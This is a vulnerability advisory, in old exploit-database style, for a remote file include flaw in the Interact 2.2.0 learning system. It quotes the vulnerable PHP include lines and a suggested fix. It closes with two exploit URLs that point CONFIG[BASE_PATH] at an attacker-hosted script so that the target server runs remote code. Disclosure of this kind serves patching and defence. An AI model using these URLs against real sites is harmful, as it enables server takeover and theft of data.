interact <= 2.2 (CONFIG[BASE_PATH]) Remote File Include Vulnerability

/*

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

-   - - [Romanian Electronic Network Security Lab Team ThE Best Romanian Hacking Team] - -

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

- Cce-interact <= 2.2.0 (CONFIG[BASE_PATH]) Remote File Include Vulnerability

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

- [Script name: Interact - Online Learning and Collaboration System v. 2.2.0

- [Script site: https://sourceforge.net/projects/cce-interact/

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

-          Find by: CarcaBot

+

-          Contact: CarcaBotx (at) yahoo (dot) com [email concealed]

-                        or

-          http://Hacking.CarcaBot.ro

+

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+

- Special Greetz: CarcaBot

- http://Hacking.CarcaBot.ro

-

+

*/

/*

vulnerable code => admin/autoprompter.php line 33-38:

....

require_once($CONFIG['BASE_PATH'].'/modules/forum/autoprompt/prompt.inc.
php');

require_once($CONFIG['LANGUAGE_CPATH'].'/forum_strings.inc.php');

$rs = $CONN->Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key,

{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey,

{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey,

{$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt,

{$CONFIG['DB_PREFIX']}posts.subject,

{$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key,
{$CONFIG['DB_PREFIX']}posts.thread_key,{$CONFIG['DB_PREFIX']}ForumThread
Management.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name,

{$CONFIG['DB_PREFIX']}posts.added_by_key FROM

{$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,{$CON
FIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces

LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON

{$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX'
]}postsAutoPrompts.post_key

WHERE

{$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX'
]}posts.post_key

AND

{$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpace
Links.ModuleKey

AND

{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Sp
aces.SpaceKey

AND

{$CONFIG['DB_PREFIX']}posts.date_added<DATE_SUB(CURRENT_DATE,INTERVAL

{$CONFIG['DB_PREFIX']}ForumThreadManagement.DaysToWait DAY) AND

{$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key IS NULL ORDER BY

{$CONFIG['DB_PREFIX']}posts.post_key");

....

Fix Exploit:

admin/autoprompter.php line 33-38:

....

require_once('../local/config.inc.php');

require_once($CONFIG['BASE_PATH'].'/modules/forum/autoprompt/prompt.inc.
php');

require_once($CONFIG['LANGUAGE_CPATH'].'/forum_strings.inc.php');

$rs = $CONN->Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key,

{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey,

{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey,

{$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt,

{$CONFIG['DB_PREFIX']}posts.subject,

{$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key,
{$CONFIG['DB_PREFIX']}posts.thread_key,{$CONFIG['DB_PREFIX']}ForumThread
Management.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name,

{$CONFIG['DB_PREFIX']}posts.added_by_key FROM

{$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,{$CON
FIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces

LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON

{$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX'
]}postsAutoPrompts.post_key

WHERE

{$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX'
]}posts.post_key

AND

{$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpace
Links.ModuleKey

AND

{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Sp
aces.SpaceKey

AND

{$CONFIG['DB_PREFIX']}posts.date_added<DATE_SUB(CURRENT_DATE,INTERVAL

{$CONFIG['DB_PREFIX']}ForumThreadManagement.DaysToWait DAY) AND

{$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key IS NULL ORDER BY

{$CONFIG['DB_PREFIX']}posts.post_key");

....

vulnerable code => includes/common.inc.php line 35-40:

....

$CONFIG['ADODB_PATH']    = $CONFIG['BASE_PATH'].'/includes/adodb';

//Include database abstraction classes

require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php');

require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php');

....

Exploit Fix:

includes/common.inc.php line 35-40:

....

require_once('../local/config.inc.php');

$CONFIG['ADODB_PATH']    = $CONFIG['BASE_PATH'].'/includes/adodb';

//Include database abstraction classes

require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php');

require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php');

*/

#Exploit:

http://www.site.com/[Cce-interact_path]/admin/autoprompter.php?CONFIG[BA
SE_PATH]=[http://www.myevilsite.com/evil_scripts.txt]

http://www.site.com/[Cce-interact_path]/includes/common.inc.php?CONFIG[B
ASE_PATH]=[http://www.myevilsite.com/evil_scripts.txt]

### End of File ###

### http://Hacking.CarcaBot.ro ###